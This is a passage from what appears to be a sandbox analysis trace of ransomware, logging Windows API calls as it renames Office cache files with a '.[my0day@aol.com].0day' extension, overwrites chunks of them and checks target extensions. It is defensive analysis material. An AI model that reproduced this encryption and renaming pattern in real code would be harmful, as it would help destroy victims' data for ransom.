Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.202] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=28016276) returned 1 [0044.202] CloseHandle (hObject=0x1a0) returned 1 [0044.202] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0044.202] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.203] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.203] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.203] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.203] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.203] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.212] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.212] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.224] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.224] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.224] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.245] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.245] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0044.420] SetEndOfFile (hFile=0x1a0) returned 1 [0044.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.420] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.420] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.421] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.421] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.423] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.424] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.426] CloseHandle (hObject=0x1a0) returned 1 [0044.426] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.426] lstrlenW (lpString=".doc") returned 4 [0044.426] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.426] lstrlenW (lpString=".docx") returned 5 [0044.426] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.426] lstrlenW (lpString=".pdf") returned 4 [0044.426] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.426] lstrlenW (lpString=".xls") returned 4 [0044.426] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.426] lstrlenW (lpString=".xlsx") returned 5 [0044.426] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.426] lstrlenW (lpString=".ppt") returned 4 [0044.426] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.426] lstrlenW (lpString=".zip") returned 4 [0044.426] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.426] lstrlenW (lpString=".rar") returned 4 [0044.427] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.427] lstrlenW (lpString=".bz2") returned 4 [0044.427] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.427] lstrlenW (lpString=".7z") returned 3 [0044.427] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.427] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.427] lstrlenW (lpString=".dbf") returned 4 [0044.427] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.427] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.427] lstrlenW (lpString=".1cd") returned 4 [0044.427] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.427] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.427] lstrlenW (lpString=".jpg") returned 4 [0044.427] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.427] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.427] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.427] lstrlenW (lpString=".doc") returned 4 [0044.427] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.427] lstrlenW (lpString=".docx") returned 5 [0044.427] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.427] lstrlenW (lpString=".pdf") returned 4 [0044.427] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString=".xls") returned 4 [0044.428] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString=".xlsx") returned 5 [0044.428] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.428] lstrlenW (lpString=".ppt") returned 4 [0044.428] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.428] lstrlenW (lpString=".zip") returned 4 [0044.428] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString=".rar") returned 4 [0044.428] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString=".bz2") returned 4 [0044.428] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.428] lstrlenW (lpString=".7z") returned 3 [0044.428] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.428] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.428] lstrlenW (lpString=".dbf") returned 4 [0044.428] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.428] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.428] lstrlenW (lpString=".1cd") returned 4 [0044.428] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.428] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0044.428] lstrlenW (lpString=".jpg") returned 4 [0044.428] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.428] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0044.428] lstrlenW (lpString="ose.exe") returned 7 [0044.428] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.429] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=174440) returned 1 [0044.429] CloseHandle (hObject=0x1a0) returned 1 [0044.429] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0044.429] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.429] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.429] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.429] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.429] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.429] GetLastError () returned 0x0 [0044.429] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0044.434] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0044.438] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.438] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0044.438] SetEndOfFile (hFile=0x1d8) returned 1 [0044.438] CloseHandle (hObject=0x1d8) returned 1 [0044.439] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.439] SetEndOfFile (hFile=0x1a0) returned 1 [0044.440] CloseHandle (hObject=0x1a0) returned 1 [0044.440] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.440] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.441] lstrlenW (lpString=".doc") returned 4 [0044.441] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0044.441] lstrlenW (lpString=".docx") returned 5 [0044.441] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0044.441] lstrlenW (lpString=".pdf") returned 4 [0044.441] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0044.441] lstrlenW (lpString=".xls") returned 4 [0044.441] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0044.441] lstrlenW (lpString=".xlsx") returned 5 [0044.441] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0044.441] lstrlenW (lpString=".ppt") returned 4 [0044.441] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.441] lstrlenW (lpString=".zip") returned 4 [0044.441] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0044.441] lstrlenW (lpString=".rar") returned 4 [0044.441] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0044.441] lstrlenW (lpString=".bz2") returned 4 [0044.441] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0044.441] lstrlenW (lpString=".7z") returned 3 [0044.441] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.441] lstrlenW (lpString=".dbf") returned 4 [0044.441] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.441] lstrlenW (lpString=".1cd") returned 4 [0044.441] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".jpg") returned 4 [0044.442] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".doc") returned 4 [0044.442] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0044.442] lstrlenW (lpString=".docx") returned 5 [0044.442] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0044.442] lstrlenW (lpString=".pdf") returned 4 [0044.442] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString=".xls") returned 4 [0044.442] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString=".xlsx") returned 5 [0044.442] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0044.442] lstrlenW (lpString=".ppt") returned 4 [0044.442] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".zip") returned 4 [0044.442] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString=".rar") returned 4 [0044.442] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0044.442] lstrlenW (lpString=".bz2") returned 4 [0044.442] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0044.442] lstrlenW (lpString=".7z") returned 3 [0044.442] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".dbf") returned 4 [0044.442] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".1cd") returned 4 [0044.442] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0044.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0044.442] lstrlenW (lpString=".jpg") returned 4 [0044.443] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0044.443] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0044.443] lstrlenW (lpString="osetup.dll") returned 10 [0044.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.443] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=7378792) returned 1 [0044.443] CloseHandle (hObject=0x1a0) returned 1 [0044.443] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0044.443] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.443] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.444] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0044.444] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.444] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.444] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.660] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.660] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.668] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.668] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.668] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.695] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.695] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0044.874] SetEndOfFile (hFile=0x1a0) returned 1 [0044.874] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.878] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.878] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.911] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.911] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.913] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.913] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.914] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.914] CloseHandle (hObject=0x1a0) returned 1 [0044.914] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.915] lstrlenW (lpString=".doc") returned 4 [0044.915] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.915] lstrlenW (lpString=".docx") returned 5 [0044.915] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0044.915] lstrlenW (lpString=".pdf") returned 4 [0044.915] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.915] lstrlenW (lpString=".xls") returned 4 [0044.915] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.915] 